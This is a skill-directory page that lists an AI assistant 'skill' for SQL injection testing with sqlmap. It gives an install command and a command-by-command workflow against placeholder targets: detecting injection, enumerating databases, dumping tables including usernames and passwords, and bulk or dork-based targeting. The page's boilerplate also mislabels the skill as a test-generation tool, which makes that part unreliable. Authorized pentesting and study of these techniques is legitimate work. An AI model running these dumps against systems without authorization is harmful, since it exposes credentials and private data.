Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Sqlmap Database Pentesting

Sqlmap Database Pentesting is an code AI skill with a core value of This skill should be used when the user asks to \"automate SQL injection testing,\" \"enumerate database structure,\" \"extract database credentials using sqlmap,\" \"dump tables and columns. It helps developers solve real-world problems in the code domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"automate SQL injection testing,\" \"enumerate database structure,\" \"extract database credentials using sqlmap,\" \"dump tables and columns...

Last verified on: 2026-07-08

Quick Facts

Category code
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-08
Risk Level High
mkdir -p ./skills/sqlmap-database-pentesting && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/sqlmap-database-pentesting/SKILL.md -o ./skills/sqlmap-database-pentesting/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# SQLMap Database Penetration Testing


Purpose


Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.


Inputs / Prerequisites


- **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)

- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub

- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable

- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection

- **Authorization**: Written permission for penetration testing activities


Outputs / Deliverables


- **Database Enumeration**: List of all databases on the target server

- **Table Structure**: Complete table names within target database

- **Column Mapping**: Column names and data types for each table

- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data

- **Hash Values**: Password hashes for offline cracking

- **Vulnerability Report**: Confirmation of SQL injection type and severity


Core Workflow


1. Identify SQL Injection Vulnerability


#### Manual Verification

bash
# Add single quote to break query
http://target.com/page.php?id=1'

# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"

#### Initial SQLMap Scan

bash
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch

# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3

2. Enumerate Databases


#### List All Databases

bash
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch

**Key Options:**

- `-u`: Target URL with injectable parameter

- `--dbs`: Enumerate database names

- `--batch`: Use default answers (non-interactive mode)


3. Enumerate Tables


#### List Tables in Specific Database

bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch

**Key Options:**

- `-D`: Specify target database name

- `--tables`: Enumerate table names


4. Enumerate Columns


#### List Columns in Specific Table

bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch

**Key Options:**

- `-T`: Specify target table name

- `--columns`: Enumerate column names


5. Extract Data


#### Dump Specific Table Data

bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch

#### Dump Specific Columns

bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch

#### Dump Entire Database

bash
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch

**Key Options:**

- `--dump`: Extract all data from specified table

- `--dump-all`: Extract all data from all tables

- `-C`: Specify column names to extract


6. Advanced Target Options


#### Target from HTTP Request File

bash
# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batch

#### Target from Log File

bash
# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batch

#### Target Multiple URLs (Bulk File)

bash
# Create file with URLs, one per line:
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch

#### Target via Google Dorks (Use with Caution)

bash
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batch

Quick Reference Commands


Database Enumeration Progression


| Stage | Command |

|-------|---------|

| List Databases | `sqlmap -u "URL" --dbs --batch` |

| List Tables | `sqlmap -u "URL" -

🎯 Best For

  • QA engineers
  • Developers writing unit tests
  • Claude users
  • Software engineers
  • Development teams

💡 Use Cases

  • Generating test cases for edge conditions
  • Writing integration test suites
  • Code quality improvement
  • Best practice enforcement

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Sqlmap Database Pentesting to Your Work

    Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.

  4. 4

    Review and Refine

    Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.

❓ Frequently Asked Questions

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

Is Sqlmap Database Pentesting compatible with Cursor and VS Code?

Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.

Do I need specific dependencies for Sqlmap Database Pentesting?

Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.

How do I install Sqlmap Database Pentesting?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/sqlmap-database-pentesting/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Skipping validation

Always test AI-generated code changes, even for simple refactors.

Missing dependency updates

Check if the skill requires updated dependencies or new packages.

🔗 Related Skills